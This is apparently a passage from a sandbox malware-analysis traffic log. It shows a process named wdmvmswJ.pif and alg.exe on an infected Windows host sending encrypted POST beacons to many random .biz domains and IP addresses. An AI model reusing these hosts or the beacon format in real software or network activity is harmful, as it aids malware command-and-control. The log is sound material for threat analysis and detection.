                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:01.224255085 CET | 778 | OUT | Data Raw: 54 20 4f 3e 71 87 26 d5 fe 02 00 00 72 cb 29 17 71 fc a3 72 61 65 14 62 f2 5a b8 fd b1 53 34 96 bf 71 5a a0 8c 07 23 c6 bd 97 71 6a 65 6e 63 32 5c e5 fe 16 61 f4 5e 74 09 2d c6 2f d5 e3 43 d4 9b 24 d1 65 52 c6 eb c3 1c 0f cc dc 0b 77 81 ef 50 82
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: T O>q&r)qraebZS4qZ#qjenc2\a^t-/C$eRwP_l+SAm#7.Uoj}pC]KOB LE8LsFC h*|G]b<]O^sAlx:a'srBH~USNZnJ,C-TS%U&ou.#c
Nov 1, 2024 08:24:02.651112080 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c473b2e15352f9302cd3ab24e4f1a327|173.254.250.82|1730445842|1730445842|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.8 | 49755 | 3.94.10.34 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:01.232250929 CET | 355 | OUT | POST /xhqdokiwwp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:01.232250929 CET | 802 | OUT | Data Raw: fa cd ce 0c 81 c9 6b c1 16 03 00 00 2d ec 0f ab 35 4a f6 26 5d 5b a0 15 a2 ca 17 f3 0a e0 76 79 ce 83 9e 9b e0 d2 76 d9 a0 f3 1e 0b 8b 68 69 f8 21 36 21 af 97 b7 e1 53 63 f2 bf 11 f0 b4 1e 93 28 92 cb fd dd bc 5f 6e fb b6 36 9b 33 7c 41 49 4b 15
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: k-5J&][vyvhi!6!Sc(_n63|AIK2+aXx(]XSKS6C,FR#E+hgLwG'G38a'gp8Vvq~t6]9S}rsX +U@M(waLZP`4+Z8v_t
Nov 1, 2024 08:24:01.892689943 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=281aceda934a0bc4ab7eb229f75af062|173.254.250.82|1730445841|1730445841|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 49756 | 165.160.13.20 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:01.935746908 CET | 343 | OUT | POST /na HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:01.935771942 CET | 802 | OUT | Data Raw: f2 ef 7f 29 4a f4 80 2e 16 03 00 00 b4 dc c5 b1 a0 60 fa 1e c4 2f 8d 29 39 2b df 2f ea 6c 74 c1 13 ff 28 01 83 e3 fa 15 bc 6e 2e 2d e8 65 d9 03 e8 08 c8 b4 e0 12 45 d1 8b 12 21 b0 49 65 af 36 0d e1 15 01 3b d3 80 95 b1 c7 8d a2 4e 89 fe 64 f8 3a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )J.`/)9+/lt(n.-eE!Ie6;Nd:c!k9uvBjTuA11{vN3tQyV>ZV~%kwFR(@C.>ufm{PgYH3*uS%TB=nQ;f')e=+r`wp).F
Nov 1, 2024 08:24:02.622211933 CET | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Nov 1, 2024 08:24:02.669987917 CET | 345 | OUT | POST /koph HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:02.670022011 CET | 802 | OUT | Data Raw: 03 95 cf fb de 32 ab 94 16 03 00 00 44 ca 61 91 aa 43 78 0e 3d f4 d6 d6 33 64 83 51 5a 71 11 51 7a f4 f8 67 a5 2b 1d e5 44 d5 b1 20 b6 c2 55 9b c5 50 ae af 0e 43 20 3e 83 d8 41 4a 72 71 0a 06 f6 37 61 24 6b ad 72 f9 fd 80 88 b3 c2 3a 9b 33 56 0e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 2DaCx=3dQZqQzg+D UPC >AJrq7a$kr:3V[]gy&!XmnA:Zv`gnwNZ\^'1fKYKlY$Yv^7a-{5`K+}i6bdwY"O]5"8:ZtNOY09XlM6
Nov 1, 2024 08:24:02.840455055 CET | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.8 | 49757 | 44.221.84.105 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:02.769706011 CET | 346 | OUT | POST /m HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:02.769706011 CET | 778 | OUT | Data Raw: 25 d9 c5 97 50 cb d7 e7 fe 02 00 00 26 28 f2 dc be ef d6 76 14 75 82 89 76 4a 4f a7 2d 4a ed 56 df 29 b3 ff b0 09 e6 ce b4 79 6e 5f 44 9b 1f 2d 6c ec 3a 8a 9e f2 e2 ad 29 fa 6d 55 fe e8 b6 19 58 40 5d b2 bb 2c f4 b6 3c 95 71 54 10 e5 e1 fd 63 3f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: %P&(vuvJO-JV)yn_D-l:)mUX@],<qTc?(;kivEP7NR%#\w?8u1rDd6L_$L`Z1X,E2ZwEj_cAQvoSRg&m,IqK`!Et}<


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 49758 | 54.244.188.177 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:02.889302969 CET | 352 | OUT | POST /rifyadu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:02.889317989 CET | 802 | OUT | Data Raw: 16 ed a2 44 cf c8 3e 2d 16 03 00 00 3a ab 20 04 f0 d5 ca c3 33 6d 1b ce 91 01 02 d6 30 cd cb eb 59 13 ac 62 2b 8c c4 34 13 1f 4c fb 98 f9 1a d7 55 54 95 e0 8e 13 ce 34 e6 f5 e0 85 b6 1f 01 50 76 c3 53 91 4c 10 cb a2 87 cf a2 fd 01 b6 72 b7 a9 1b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: D>-: 3m0Yb+4LUT4PvSLr\QR[lz(P{xf:aa71m4Y4RXj[~wi'{Ck)xp;S%2S|EFuFP0&E2.\Z2c/]+s#~>S,,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 49759 | 54.244.188.177 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:03.063754082 CET | 349 | OUT | POST /lauq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:03.063786983 CET  802  OUT  Data Raw: 93 eb 7d ad 5a c8 8d c4 16 03 00 00 65 8b b7 cd ce eb c1 a9 97 63 3a 07 84 46 63 bd a4 dc 4c b8 fa b0 b2 f5 47 31 dc 62 de 40 aa c4 bb 83 8f 97 5c e7 28 32 a1 8f 36 67 e8 0b 25 30 dd f3 69 f7 15 62 49 05 8b 7b f4 b9 19 b0 f3 2f 11 46 0f 22 63 8c
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: }Zec:FcLG1b@\(26g%0ibI{/F"cFwjX.`AEmFHDJJ+(<p*eTtA4&=v1us^Q)T';%wARPlx_1,J&z*BfxFWSh8y 1c]
Nov 1, 2024 08:24:03.898284912 CET  417  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=41e55ea1ec11dd13caf62bbe0de80329|173.254.250.82|1730445843|1730445843|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
45          192.168.2.8  49760        44.221.84.105   80                4916  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Nov 1, 2024 08:24:03.239578962 CET  358  OUT  POST /owesbtnhccxha HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:03.239610910 CET  778  OUT  Data Raw: 6c ab db 34 5f 6a 14 65 fe 02 00 00 30 01 ec 78 7f 71 cf 99 a4 de 19 5b 49 b7 fa 06 5a 2e ab 0a 05 a6 f1 9a 63 e2 0c bf e8 36 3a 5a f9 fe ca 51 0a 37 0a 33 75 8d 2b f2 19 42 63 f4 74 fb dc b9 cc 42 27 1c 96 97 a3 41 92 59 61 0e e3 54 07 ea c8 e5
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l4_je0xq[IZ.c6:ZQ73u+BctB'AYaTx#T\|#,?Or;M|sjH9@U84ECi~1BA%`1srD)I/-LJsCGvZ*oM[M ^R=,}4dh-EXmA{W_
Nov 1, 2024 08:24:03.898834944 CET  417  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=1ae457f87c0a29403c8a946c86c9d457|173.254.250.82|1730445843|1730445843|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.8  49761        208.100.26.245  80                4536  C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp  Bytes transferred  Direction  Data
Nov 1, 2024 08:24:03.951025963 CET  346  OUT  POST /rte HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:03.951046944 CET  802  OUT  Data Raw: 03 f5 3d fe 1d 0a 1b 50 16 03 00 00 8b f5 65 d7 03 3c 92 b0 8b 37 9d d7 b2 84 7e eb 57 54 36 f9 38 1e 52 1c 2c 6f 80 68 6f ce 34 35 78 a9 a2 81 83 ee e1 29 9f a5 32 87 27 bc 1e 08 cd 1f fe d7 da ef 17 52 99 78 a6 a8 bd 39 69 5a 10 bb c9 80 c9 4b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =Pe<7~WT68R,oho45x)2'Rx9iZKt9B2!dEKtK2Ul+0PUWHb?CRIN^R(<\c|:|{m5x[*vb'DJ)xA0rol2b.1Yf\8"X-*(T;X
Nov 1, 2024 08:24:04.595192909 CET  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 1, 2024 08:24:04.607525110 CET  344  OUT  POST /x HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:04.607559919 CET | 802 | OUT | Data Raw: e0 d5 0b db 08 dc be ab 16 03 00 00 1a d6 96 6f 3f 39 fd 18 b0 58 bb 50 cb 8b 7a 03 18 7e 73 a4 78 0d 6b 52 77 00 03 a2 a1 6f 9c 59 59 39 42 2b 6a 7a e1 05 ab a5 4b 07 04 f7 0e e5 78 d4 2b 21 35 a9 e8 fe 2a 04 c7 e2 ae b3 81 4c 1c 8d 91 77 92 48
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: o?9XPz~sxkRwoYY9B+jzKx+!5*LwHTiVjrFlus*^'&O.~f&='9T2k_0xJ_Py=KLg~^jwdegpJWE`bcK (=rqx:cm}8_VEG^d TH
Nov 1, 2024 08:24:04.754420042 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.8 | 49762 | 18.141.10.107 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:04.031634092 CET | 344 | OUT | POST /p HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:04.031647921 CET | 778 | OUT | Data Raw: 2a 4d fe cf 20 8c 1d 1b fe 02 00 00 47 5c b6 0d 23 cb 57 a0 94 74 4e 56 00 e1 b9 e8 78 94 0c dc 5a 7e 11 a8 a3 66 46 36 a1 fd 94 77 d0 ae 3f ee 32 2a 2d fc 51 fe 84 c1 d2 15 e1 33 67 25 62 37 11 82 8c 41 89 93 4c 6e bb 6b e0 f8 b7 ed d4 7d 32 53
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *M G\#WtNVxZ~fF6w?2*-Q3g%b7ALnk}2SY|f )I7Br@2B,bL5ygBx<73tZFK?Yp+Yf:Wt))iKaSeqCqN6pQ;H
Nov 1, 2024 08:24:05.524547100 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5ad3bde7d6d8327629d7b578e296ebd4|173.254.250.82|1730445845|1730445845|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.8 | 49763 | 34.211.97.45 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:04.798916101 CET | 356 | OUT | POST /ceabvuhcchcwyyq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:04.798916101 CET | 802 | OUT | Data Raw: 8e 9c a0 39 f1 f1 6b bd 16 03 00 00 5b 10 a8 bd 29 0f 15 47 b8 0f 29 81 7d ba 0b 3c c4 9d 68 17 da ff 8b 44 bd 21 eb 08 65 5b 97 b6 13 ed 6a ce 62 90 49 4d 62 a7 af 26 ca 49 1a 1f d1 31 57 c1 25 2a b2 4c 2b 28 37 d3 34 7d 81 0b 01 7b 7f 71 5b 2a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 9k[)G)}<hD!e[jbIMb&I1W%*L+(74}{q[*K&!:PAKaLmh5=d1oRDO\xyss3)3c!-PS:UBVq#uJ57]s*3<=sFs*%)BdiZ:\oH]>.F
Nov 1, 2024 08:24:05.630702019 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fe0dee08aaa6a456f7bed84c23085338|173.254.250.82|1730445845|1730445845|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
